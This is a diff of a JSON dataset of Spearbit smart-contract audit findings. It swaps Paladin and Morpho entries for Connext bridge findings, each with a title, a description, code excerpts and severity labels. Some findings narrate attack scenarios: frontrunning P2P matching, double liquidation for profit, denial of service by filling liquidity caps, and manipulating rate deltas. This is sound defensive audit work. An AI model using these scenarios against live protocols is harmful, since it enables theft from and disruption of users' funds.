return _canonical; }", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Could replace claims[i].questID with questID", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Could replace claims[i].questID with questID (as they are equal due to the check above)", + "title": "When initializing the Connext bridge, make sure the _xAppConnectionManager domain matches the one provided to the initialization function for the bridge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The only contract that implements IConnectorManager fully is SpokeConnector (through inheriting ConnectorManager and overriding localDomain): // File: SpokeConnector.sol function localDomain() external view override returns (uint32) { return DOMAIN; } So a SpokeConnector or an IConnectorManager has its own concept of the local domain (the domain that it lives on / is deployed to), and this domain is used when we are hashing messages and inserting them into the SpokeConnector's merkle tree: // File: SpokeConnector.sol bytes memory _message = Message.formatMessage( DOMAIN, bytes32(uint256(uint160(msg.sender))), _nonce, _destinationDomain, _recipientAddress, _messageBody ); // Insert the hashed message into the Merkle tree. bytes32 _messageHash = keccak256(_message); // Returns the root calculated after insertion of message, needed for events for // watchers (bytes32 _root, uint256 _count) = MERKLE.insert(_messageHash); We need to make sure that this local domain matches the _domain provided to this init function. Otherwise, the message hashes that are inserted into SpokeConnector's merkle tree would have 2 different origin domains linked to them: one from SpokeConnector in this message hash and one from connext's s.domain = _domain, which is used in calculating the transfer id hash. The same issue applies to setXAppConnectionManager.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Change function visibility from public to external", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The function updateRewardToken of the QuestBoard contract could be set external to save gas and improve code quality.", + "title": "The stable swap pools used in Connext are incompatible with tokens with varying decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The stable swap functionality used in Connext calculates and stores, for each token in a pool, the token's precision relative to the pool's precision. The token precision calculation uses the token's decimals. Since this precision is only set once, for a token that can have its decimals changed at a later time, the precision used might not always stay accurate. In the event of a token decimal change, the swap calculations involving this token would be inaccurate.
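For the _xAppConnectionManager finding above, a minimal sketch of the suggested consistency check at initialization (the error name is hypothetical, not Connext's):

    // Reject an _xAppConnectionManager whose local domain disagrees with the
    // _domain that will be stored in s.domain and used in transfer id hashes.
    if (_xAppConnectionManager.localDomain() != _domain) {
        revert DiamondInit__init_domainMismatch(); // hypothetical error name
    }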
For example, in _xp(...): function _xp(uint256[] memory balances, uint256[] memory precisionMultipliers) internal pure returns (uint256[] memory) { uint256 numTokens = balances.length; require(numTokens == precisionMultipliers.length, \"mismatch multipliers\"); uint256[] memory xp = new uint256[](numTokens); for (uint256 i; i < numTokens; ) { xp[i] = balances[i] * precisionMultipliers[i]; unchecked { ++i; } } return xp; } We are multiplying in xp[i] = balances[i] * precisionMultipliers[i]; and cannot use division for tokens that have higher precision than the pool's default precision.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Functions isClaimed() and _setClaimed() can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The functions isClaimed() and _setClaimed() of the contract MultiMerkleDistributor can be optimized to save gas. See OZ BitMaps for inspiration.", + "title": "When Connext reaches the allowed custodied cap, race conditions can be created", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When IERC20(local).balanceOf(address(this)) is close to s.caps[key] (this can be relative/subjective) for a canonical token on its canonical domain, a race condition gets created where users might try to frontrun each other's calls to xcall or xcallIntoLocal to be included in a cross-chain transfer. This race condition is actually between all users and all liquidity routers, since the same type of check is performed when routers try to add liquidity: uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); }", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Missing events for owner only functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces.", + "title": "Prevent sequencers from signing multiple routes for the same cross-chain transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Liquidity routers only sign the hash of the (transferId, pathLength) combo. This means that each router does not have a say in: 1. The ordering of routers provided/signed by the sequencer. 2. What other routers are used in the sequence.
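To make the varying-decimals finding above concrete, a hedged sketch (names are illustrative, not Saddle/Connext code) of how a precision multiplier is typically derived once from decimals() and then goes stale if decimals later change:

    import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

    uint8 constant POOL_PRECISION_DECIMALS = 18; // illustrative pool precision

    // The multiplier is computed once, at pool setup, from the token's current
    // decimals(). If decimals() changes later, xp[i] = balances[i] * multiplier
    // no longer normalizes the balance to the pool's precision. Reverts for
    // tokens with more than 18 decimals, mirroring the multiply-only design.
    function precisionMultiplier(address token) view returns (uint256) {
        return 10 ** (POOL_PRECISION_DECIMALS - ERC20(token).decimals());
    }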
If a sequencer signs 2 different routes (set of routers) for a cross-chain transfer, a relayer can decide which set of routers to use and provide to BridgeFacet.execute to make sure the liquidity from a specific set of routers' balances is used (also the same possibility if 2 different sequencers sign 2 different routes for a cross-chain transfer).", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Use nonReentrant modifier in a consistent way", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The functions claim(), claimQuest() and recoverERC20() of contract MultiMerkleDistributor send tokens but dont have a nonReentrant modifier. All other functions that send tokens do have this modifier. Note: as the checks & effects patterns is used this is not really necessary. function claim(...) public { ... IERC20(rewardToken).safeTransfer(account, amount); } function claimQuest(...) external { ... IERC20(rewardToken).safeTransfer(account, totalClaimAmount); } function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; }", + "title": "Well-funded malicious actors can DOS the bridge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A malicious actor (e.g. a well-funded cross-chain messaging competitor) can DOS the bridge cheaply. Assume an Ethereum <-> Polygon bridge where the liquidity cap for USDC is set to 1m. 1. Using a slow transfer to avoid router liquidity fees, Bob (attacker) transferred 1m USDC from Ethereum to Polygon. 1m USDC will be locked on Connext's Bridge. Since the liquidity cap for USDC is filled, no one will be able to transfer any USDC from Ethereum to Polygon unless someone transfers POS-USDC from Polygon to Ethereum to reduce the amount of USDC held by the bridge. 2. On the destination chain, nextUSDC (local bridge asset) will be swapped to POS-USDC (adopted asset). The swap will incur low slippage because it is a stableswap. Assume that Bob will receive 999,900 POS-USDC back on Polygon. A loss of a few hundred or thousand dollars is probably nothing for a determined competitor that wants to harm the reputation of Connext. 3. Bob bridged back the 999,900 POS-USDC using Polygon's Native POS bridge. Bob will receive 999,900 USDC in his wallet in Ethereum after 30 minutes. It is a 1-1 exchange using a native bridge, so no loss is incurred here. 4. Whenever the liquidity cap for USDC gets reduced on Connext's Bridge, Bob will repeat the same trick to keep the bridge in a locked state. 5. If Bob is well-funded enough, he could perform this against all Connext's bridges linked to other chains for popular assets (e.g.
USDC), and normal users will have issues transferring popular assets when using xcall.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Place struct definition at the beginning of the contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Regarding Solidity Style Guide, the struct definition can move to the beginning of the contract.", + "title": "calculateTokenAmount is not checking whether the provided amounts array has the same length as balances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There is no check to make sure amounts.length == balances.length in calculateTokenAmount: function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256 a = _getAPrecise(self); uint256[] memory balances = self.balances; ... There are 2 bad cases: 1. amounts.length > balances.length, in this case, we have provided extra data which will be ignored silently and might cause miscalculation on or off chain. 2. amounts.length < balances.length, the loop in calculateTokenAmount would/should revert because of an index-out-of-bounds error. In this case, we might spend more gas than necessary compared to if we had performed the check and reverted early.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Improve checks for past quests in increaseQuestReward() and increaseQuestObjective()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The functions increaseQuestReward() and increaseQuestObjective() check: newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote. This is true when the quest is in the past (e.g. currentPeriod is outside of the quest range), because all the values will be 0. Luckily execution is stopped at _getRemainingDuration(questID), however it would be more logical to put this check near the start of the function. function increaseQuestReward(...) ... { updatePeriod(); ... require(newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote, \"QuestBoard: New reward must be higher\"); ... uint256 remainingDuration = _getRemainingDuration(questID); require(remainingDuration > 0, \"QuestBoard: no more incoming QuestPeriods\"); ... ,! } The function _getRemainingDuration() reverts when the quest is in the past, as currentPeriod will be larger than lastPeriod. The is not what you would expect from this function. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; return (lastPeriod - currentPeriod) / WEEK; // can revert }", + "title": "Rearrange an expression in _calculateSwapInv to avoid underflows", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the following expression used in SwapUtils._calculateSwapInv, if xp[tokenIndexFrom] = x + 1, the expression would underflow and revert. We can rearrange the expression to avoid reverting in this edge case.
dx = x - xp[tokenIndexFrom] + 1;", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Should make use of token.balanceOf(address(this)); to recover tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Currently when calling the recoverERC20() function there is no way to calculate what the proper amount should be without having to check the contracts balance of token before hand. This will require an extra step and can be easily done inside the function itself.", + "title": "The pre-image of DIAMOND_STORAGE_POSITION's storage slot is known", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The preimage of the hashed storage slot DIAMOND_STORAGE_POSITION is known.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Floating pragma is set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The current pragma Solidity directive is ^0.8.10. It is recommended to specify a specific compiler version to ensure that the byte code produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (for e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs.", + "title": "The @param NatSpec comment for _key in AssetLogic._swapAsset is incorrect", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The @param NatSpec for _key indicates that this parameter is a canonical token id, whereas it should mention that it is a hash of a canonical id and its corresponding domain. We need to make sure the correct value has been passed down to _swapAsset.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Deflationary reward tokens are not handled uniformly across the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The code base does not support rebasing/deflationary/inflationary reward tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", + "title": "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both routers and the bridge share the same liquidity cap on the Connext bridge. Assume that the liquidity cap for USDC is 1 million on Ethereum. Shortly after the Connext Amarok launch, a router adds 1 million USDC liquidity. No one would be able to perform an xcall transfer with USDC from Ethereum to other chains as it will always revert because the liquidity cap has been exceeded.
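The fix for the _calculateSwapInv finding above is a one-line reordering; a hedged sketch:

    // Original: dx = x - xp[tokenIndexFrom] + 1;  underflows when
    // xp[tokenIndexFrom] == x + 1. Applying the +1 before the subtraction
    // makes the edge case evaluate to 0 instead of reverting.
    dx = x + 1 - xp[tokenIndexFrom];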
The DOS is temporary because the router's liquidity on Ethereum will be reduced if there is USDC liquidity flowing in the opposite direction (e.g., from Polygon to Ethereum).", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Typo on comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Across the codebase, there is a typo on the comment. The comment can be seen from the below. * @dev Returns the number of periods to come for a give nQuest", + "title": "Prevent deploying a representation token twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function setupAsset() is protected by _enrollAdoptedAndLocalAssets() which checks s.approvedAssets[_key] to prevent accidentally setting up an asset twice. However, the function _removeAssetId() is rather thorough and removes the s.approvedAssets[_key] flag. After a call to _removeAssetId(), an asset can be recreated via setupAsset(). This will deploy a second representation token which will be confusing to users of Connext. Note: The function setupAssetWithDeployedRepresentation() could be used to connect a previous representation token again to the canonical token. Note: All these functions are authorized so it would only be a problem if mistakes are made. function setupAsset(...) ... onlyOwnerOrAdmin ... { if (_canonical.domain != s.domain) { _local = _deployRepresentation(...); // deploys a new token } else { ... } bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _local, _stableSwapPool, _canonical); ... } function _enrollAdoptedAndLocalAssets(...) ... { ... if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); s.approvedAssets[_key] = true; ... } function _removeAssetId(...) ... { ... delete s.approvedAssets[_key]; ... }", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Require statement with gauge_types function call is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The gauge_types function of the Curve reverts when an invalid gauge is given as a parameter, the QuestBoard: Invalid Gauge error message will not be seen in the QuestBoard contract. The documentation can be seen from the Querying Gauge and Type Weights. function createQuest(...) ... { ... require(IGaugeController(GAUGE_CONTROLLER).gauge_types(gauge) >= 0, \"QuestBoard: Invalid Gauge\"); ... }", + "title": "Extra safety checks in _removeAssetId()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _removeAssetId() deletes assets, but it doesn't check if the passed parameters are a consistent set. This allows for mistakes where the wrong values are accidentally deleted. function _removeAssetId(bytes32 _key, address _adoptedAssetId, address _representation) internal { ... delete s.adoptedToCanonical[_adoptedAssetId]; delete s.representationToCanonical[_representation]; ...
}", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Missing setter function for the GAUGE_CONTROLLER", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The GAUGE_CONTROLLER address is immutable and set in the constructor. If Curve adds a new version of the gauge controller, the value of GAUGE_CONTROLLER cannot be updated and the contract QuestBoard needs to be deployed again. address public immutable GAUGE_CONTROLLER; constructor(address _gaugeController, address _chest){ GAUGE_CONTROLLER = _gaugeController; ... }", + "title": "Data length not validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The following functions do not validate that the input _data is 32 bytes. GnosisSpokeConnector._sendMessag GnosisSpokeConnector._processMessage BaseMultichain.sendMessage OptimismSpokeConnector._sendMessage The input _data contains the outbound Merkle root or aggregated Merkle root, which is always 32 bytes. If the root is not 32 bytes, it is invalid and should be rejected.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Empty events emitted in killBoard() and unkillBoard() functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "When an event is emitted, it stores the arguments passed in for the transaction logs. Currently the Killed() and Unkilled() events are emitted without any arguments passed into them defeating the purpose of using an event.", + "title": "Verify timestamp reliability on L2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Timestamp information on rollups can be less reliable than on mainnet. For instance, Arbitrum docs say: As a general rule, any timing assumptions a contract makes about block numbers and timestamps should be considered generally reliable in the longer term (i.e., on the order of at least several hours) but unreliable in the shorter term (minutes). (It so happens these are generally the same assumptions one should operate under when using block numbers directly on Ethereum!) Uniswap docs mention this for Optimism: The block.timestamp of these blocks, however, reflect the block.timestamp of the last L1 block ingested by the Sequencer.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Liquidating Morpho's Aave position leads to state desync", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desyncs from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit. Example: There's a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. 
A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", + "title": "MirrorConnector cannot be changed once set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For chains other than Polygon, the mirror connector can be changed any number of times. For the Polygon chain, _setMirrorConnector is overridden. 1. Let's take the PolygonHubConnector contract as an example: function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } 2. Since setFxChildTunnel(PolygonHubConnector) can only be called once due to the require check below, this also restricts the number of times the mirror connector can be altered. function setFxChildTunnel(address _fxChildTunnel) public virtual { require(fxChildTunnel == address(0x0), \"FxBaseRootTunnel: CHILD_TUNNEL_ALREADY_SET\"); ... }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "A market could be deprecated but still prevent liquidators to liquidate borrowers if isLiquidateBor- rowPaused is true", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Currently, when a market must be deprecated, Morpho checks that borrowing has been paused before applying the new value for the flag. function setIsDeprecated(address _poolToken, bool _isDeprecated) external onlyOwner isMarketCreated(_poolToken) { } if (!marketPauseStatus[_poolToken].isBorrowPaused) revert BorrowNotPaused(); marketPauseStatus[_poolToken].isDeprecated = _isDeprecated; emit IsDeprecatedSet(_poolToken, _isDeprecated); The same check should be done in isLiquidateBorrowPaused, allowing the deprecation of a market only if isLiq- uidateBorrowPaused == false otherwise liquidators would not be able to liquidate borrowers on a deprecated market.", + "title": "Possible infinite loop in dequeueVerified()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The loop in function dequeueVerified() doesn't end if queue.first == queue.last == 0. In this situation, at unchecked { --last; } the following happens: last wraps to type(uint128).max. Now last is very large and is surely >= first and thus the loop keeps running. This problem can occur when queue isn't initialized. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { uint128 first = queue.first; uint128 last = queue.last; require(last >= first, \"queue empty\"); for (last; last >= first; ) { ... unchecked { --last; } // underflows when last == 0 (e.g.
queue isn't initialized) } }", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "setIsPausedForAllMarkets bypass the check done in setIsBorrowPaused and allow resuming borrow on a deprecated market", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The MorphoGovernance contract allow Morpho to set the isBorrowPaused to false only if the market is not deprecated. function setIsBorrowPaused(address _poolToken, bool _isPaused) external onlyOwner isMarketCreated(_poolToken) { } if (!_isPaused && marketPauseStatus[_poolToken].isDeprecated) revert MarketIsDeprecated(); marketPauseStatus[_poolToken].isBorrowPaused = _isPaused; emit IsBorrowPausedSet(_poolToken, _isPaused); This check is not enforced by the _setPauseStatus function, called by setIsPausedForAllMarkets allowing Mor- pho to resume borrowing for deprecated market. Test to reproduce the issue // SPDX-License-Identifier: AGPL-3.0-only pragma solidity ^0.8.0; import \"./setup/TestSetup.sol\"; contract TestSpearbit is TestSetup { using WadRayMath for uint256; function testBorrowPauseCheckSkipped() public { // Deprecate a market morpho.setIsBorrowPaused(aDai, true); morpho.setIsDeprecated(aDai, true); checkPauseEquality(aDai, true, true); // you cannot resume the borrowing if the market is deprecated hevm.expectRevert(abi.encodeWithSignature(\"MarketIsDeprecated()\")); morpho.setIsBorrowPaused(aDai, false); checkPauseEquality(aDai, true, true); // but this check is skipped if I call directly `setIsPausedForAllMarkets` morpho.setIsPausedForAllMarkets(false); // this should revert because // you cannot resume borrowing for a deprecated market checkPauseEquality(aDai, false, true); } function checkPauseEquality( address aToken, bool shouldBePaused, 6 bool shouldBeDeprecated ) public { ( bool isSupplyPaused, bool isBorrowPaused, bool isWithdrawPaused, bool isRepayPaused, bool isLiquidateCollateralPaused, bool isLiquidateBorrowPaused, bool isDeprecated ) = morpho.marketPauseStatus(aToken); assertEq(isBorrowPaused, shouldBePaused); assertEq(isDeprecated, shouldBeDeprecated); } }", + "title": "Do not ignore staticcall's return value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TypedMemView calls several precompiles through the staticcall opcode and never checks its return value, assuming it is a success. For instance TypedMemView.sol#L652, TypedMemView.sol#L668-L669, and TypedMemView.sol#L685-L686: // use the identity precompile to copy // guaranteed not to fail, so pop the success pop(staticcall(gas(), 4, _oldLoc, _len, _newLoc, _len)) However, there are rare cases when a call to a precompile can fail. For example, when the call runs out of gas (since 63/64 of the gas is passed, the remaining execution can still have gas). Generally, not checking for success of calls is dangerous and can have unintended consequences.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "User withdrawals can fail if Morpho position is close to liquidation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\").
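For the dequeueVerified finding above, a minimal sketch of one way to stop the unchecked decrement from wrapping (Queue layout assumed, verification logic elided; a complete fix would also reject an uninitialized queue up front):

    for (; last >= first; ) {
        // ... verification logic elided ...
        if (last == 0) break; // prevents wrap-around to type(uint128).max when first == 0
        unchecked { --last; }
    }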
If the Morpho position on Aave's debt / collateral value is higher than the market's max LTV ratio but lower than the market's liquidation threshold, the borrow will fail and the position can also not be liquidated. The withdrawals could fail.", + "title": "Renounce wait time can be extended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The _proposedOwnershipTimestamp updates every time proposeNewOwner is called with newlyProposed as the zero address. This extends the time until ownership can be renounced.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "P2P borrowers' rate can be reduced", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "Users on the pool currently earn a much worse rate than users with P2P credit lines. There's a queue for being connected P2P. As this queue could not be fully processed in a single transaction the protocol introduces the concept of a max iteration count and a borrower/supplier \"delta\" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced, leading to worse rates than before. Example: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave). An attacker supplies a huge amount, creating a P2P credit line for every borrower. (They can repeat this step several times if the max iterations limit is reached.) 7 The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool. But the algorithm performs a \"hard withdraw\" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrowing rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in borrowing rate is socialized equally among all P2P borrowers. (reflected in an updated p2pBorrowRate as the shareOfDelta increased.) The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate. If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the \"demote borrowers\" step of the algorithm), they will earn a better P2P rate than the on-pool rate they earned before.", + "title": "Extra parameter in function checker() at encodeWithSelector()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function checker() sets up the parameters to call the function sendMessage(). However, it adds an extra parameter outboundRoot, which isn't necessary. function sendMessage() external { ... } function checker() external view override returns (bool canExec, bytes memory execPayload) { ... execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); // extra parameter ...
}", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk Original" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Frontrunners can exploit system by not allowing head of DLL to match in P2P", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "For a given asset x, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x whenever there is a new transaction in the mempool to borrow 100 units of x, Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will put the frontrunner on the head (assuming very high gas is supplied). Borrower's transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period.", + "title": "MerkleLib.insert() can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "storage. Each call to MerkleLib.insert() reads the entire tree from storage, and writes 2 (tree.count and tree.branch[i]) back to storage. These storage operations can be done only once at the beginning, by loading them in memory. The updated count and branches can be written back to the storage at the end saving expensive SSTORE and SLOAD operations.", "labels": [ "Spearbit", - "MorphoV1", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Gas Optimization" ] }, { - "title": "Differences between Morpho and Compound borrow validation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", - "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying compound borrow action). Morpho should anyway monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic reverts. Both Morpho and Compound do not check if a market is in \"deprecated\" state. This means that as soon as a user borrows some tokens, he/she can be instantly liquidated by another user. If the flag is true on Compound, the Morpho User can be liquidated directly on compound. If the flag is true on Morpho, the borrower can be liquidated on Morpho. Morpho does not check if borrowGuardianPaused[cToken] on Compound, a user could be able to borrow in P2P while the cToken market has borrow paused. 
